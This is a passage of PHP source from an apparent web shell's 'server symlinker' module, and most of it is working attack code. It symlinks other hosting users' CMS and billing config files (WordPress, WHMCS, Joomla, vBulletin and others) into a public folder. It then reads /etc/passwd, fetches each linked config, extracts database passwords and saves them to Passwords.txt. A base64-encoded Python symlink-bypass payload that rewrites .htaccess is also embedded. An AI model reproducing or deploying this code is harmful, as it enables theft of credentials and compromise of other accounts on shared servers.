- @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
- //Home4
- @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
- @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
- @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
- @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
- }
- //password grab
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
- {
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[1]);
- $ar=trim($ar1[0]);
- return $ar;
- }
- $ffile=fopen('Passwords.txt','a+');
- $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/spade_sym/";
- $re=$r;
- $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
- $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- $usersss=$str[0];
- foreach($confi as $co)
- {
- $uurl=$re.$usersss.$co;
- $uel=$uurl;
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $uel);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
- $result['EXE'] = curl_exec($ch);
- curl_close($ch);
- $uxl=$result['EXE'];
- if($uxl && preg_match('/table_prefix/i',$uxl))
- {
- //Wordpress
- $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
- {
- //WHMCS
- $dbp=entre2v2($uxl,"db_password = '","';");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/dbprefix/i',$uxl))
- {
- //Joomla
- $db=entre2v2($uxl,"password = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/admincpdir/i',$uxl))
- {
- //Vbulletin
- $db=entre2v2($uxl,"password'] = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
- {
- //Other
- $db=entre2v2($uxl,"DB_PASSWORD', '","');");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/dbpass/i',$uxl))
- {
- //Other
- $db=entre2v2($uxl,"dbpass = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/dbpass/i',$uxl))
- {
- //Other
- $db=entre2v2($uxl,"dbpass = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/dbpass/i',$uxl))
- {
- //Other
- $db=entre2v2($uxl,"dbpass = \"","\";");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- }
- }
- echo "<center>
- <a href=\"spade_sym/root/\">Root Server</a>
- <br><a href=\"spade_sym/Passwords.txt\">Passwords</a>
- <br><a href=\"spade_sym/\">Configurations</a></center>";
- }
- else
- {
- echo "<center>
- <form method=\"POST\">
- <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
- $file = '/etc/passwd';
- $read = @fopen($file, 'r');
- if ($read){
- $body = @fread($read, @filesize($file));
- echo "".htmlentities($body)."";
- }
- elseif(!$read)
- {
- $read = @show_source($file) ;
- }
- elseif(!$read)
- {
- $read = @highlight_file($file);
- }
- elseif(!$read)
- {
- for($uid=0;$uid<1000;$uid++)
- {
- $ara = posix_getpwuid($uid);
- if (!empty($ara))
- {
- while (list ($key, $val) = each($ara))
- {
- print "$val:";
- }
- print "\n";
- }}}
- flush();
- echo "</textarea>
- <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
- </form></center>";
- }
- }
- }elseif($_GET['do'] == 'symlink2'){
- echo "<center><h1 class='titulo'>SERVER SYMLINKER 2</h1><br><table><form method=post><tr><td><input type=submit name='pythonsym' value='Python Symlink'></td><td><input type=submit name='perlsym' value='Perl Symlink'></td><td><input type=submit name='sym1' value='Symlink V1'></td><td><input type=submit name='sym2' value='Symlink V2'></td></tr></form></table>";
- if(isset($_POST['pythonsym'])){
- $htsym = "Iy8qUHl0aG9uCgppbXBvcnQgdGltZQppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcmUKCm9zLnN5c3RlbSgiY29sb3IgQyIpCgpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5ITxicj4iCmYgPSAiQWxsIFByb2Nlc3NlcyBEb25lIVxuU3ltbGluayBCeXBhc3NlZCBTdWNjZXNzZnVsbHkhPGJyPiIKCm9zLm1ha2VkaXJzKCdTcGFkZV9weXRob25zeW0nKQpvcy5jaGRpcignU3BhZGVfcHl0aG9uc3ltJykKCnN1c3I9W10Kc2l0ZXg9W10Kb3Muc3lzdGVtKCJsbiAtcyAvIHNwLnR4dCIpCgpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggc3AucGh0bWxcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiCm0gPSBvcGVuKCIuaHRhY2Nlc3MiLCJ3KyIpCm0ud3JpdGUoaCkKbS5jbG9zZSgpCnByaW50IGh0YQoKc2YgPSAiPGh0bWw+PHRpdGxlPlN5bWxpbmsgQnlwYXNzPC90aXRsZT48Y2VudGVyPjxmb250IGNvbG9yPWxpbWUgc2l6ZT01PjxwcmU+CgkgIF9fXyAgICAgICAgICAgICAgICAgICAgICAgICBfX18gICAgICAgICAgIF9fXyAgICAgICAgICAgX19fICAgICAKICAgICAvICAvXCAgICAgICAgICBfX18gICAgICAgICAgLyAgL1wgICAgICAgICAvICAvXCAgICAgICAgIC8gIC9cICAgIAogICAgLyAgLzo6XCAgICAgICAgLyAgL1wgICAgICAgIC8gIC86OlwgICAgICAgLyAgLzo6XCAgICAgICAvICAvOjpcICAgCiAgIC9fXy86L1w6XCAgICAgIC8gIC86OlwgICAgICAvICAvOi9cOlwgICAgIC8gIC86L1w6XCAgICAgLyAgLzovXDpcICAKICBfXF8gXDpcIFw6XCAgICAvICAvOi9cOlwgICAgLyAgLzo6XCBcOlwgICAvICAvOi8gIFw6XCAgIC8gIC86OlwgXDpcIAogL19fL1wgXDpcIFw6XCAgLyAgLzo6XCBcOlwgIC9fXy86L1w6XF9cOlwgL19fLzovIFxfX1w6fCAvX18vOi9cOlwgXDpcCiBcICBcOlwgXDpcX1wvIC9fXy86L1w6XF9cOlwgXF9fXC8gIFw6XC86LyBcICBcOlwgLyAgLzovIFwgIFw6XCBcOlxfXC8KICBcICBcOlxfXDpcICAgXF9fXC8gIFw6XC86LyAgICAgIFxfX1w6Oi8gICBcICBcOlwgIC86LyAgIFwgIFw6XCBcOlwgIAogICBcICBcOlwvOi8gICAgICAgIFwgIFw6Oi8gICAgICAgLyAgLzovICAgICBcICBcOlwvOi8gICAgIFwgIFw6XF9cLyAgCiAgICBcICBcOjovICAgICAgICAgIFxfX1wvICAgICAgIC9fXy86LyAgICAgICBcX19cOjovICAgICAgIFwgIFw6XCAgICAKICAgICBcX19cLyAgICAgICAgICAgICAgICAgICAgICAgXF9fXC8gICAgICAgICAgICB+fiAgICAgICAgIFxfX1wvICAgCiAgICAgICAgICAgICAgICAgICAgICAgCjwvcHJlPjxicj5TeW1saW5rIEJ5cGFzczxicj48Zm9udCBjb2xvcj1saW1lIHNpemU9Mz48dGFibGU+IgoKbyA9IG9wZW4oJy9ldGMvcGFzc3dkJywncicpCm89by5yZWFkKCkKbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykKCmZvciB4dXNyIGluIG86Cgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykKCXN1c3IuYXBwZW5kKHh1c3IpCnByaW50ICItIiozMAp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQoKZm9yIHh4c2l0ZSBpbiB4c2l0ZToKCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikKCXNpdGV4LmFwcGVuZCh4eHNpdGUpCnByaW50IGYKcGF0aD1vcy5nZXRjd2QoKQppZiAiL3B1YmxpY19odG1sLyIgaW4gcGF0aDoKCXBhdGg9Ii9wdWJsaWNfaHRtbC8iCmV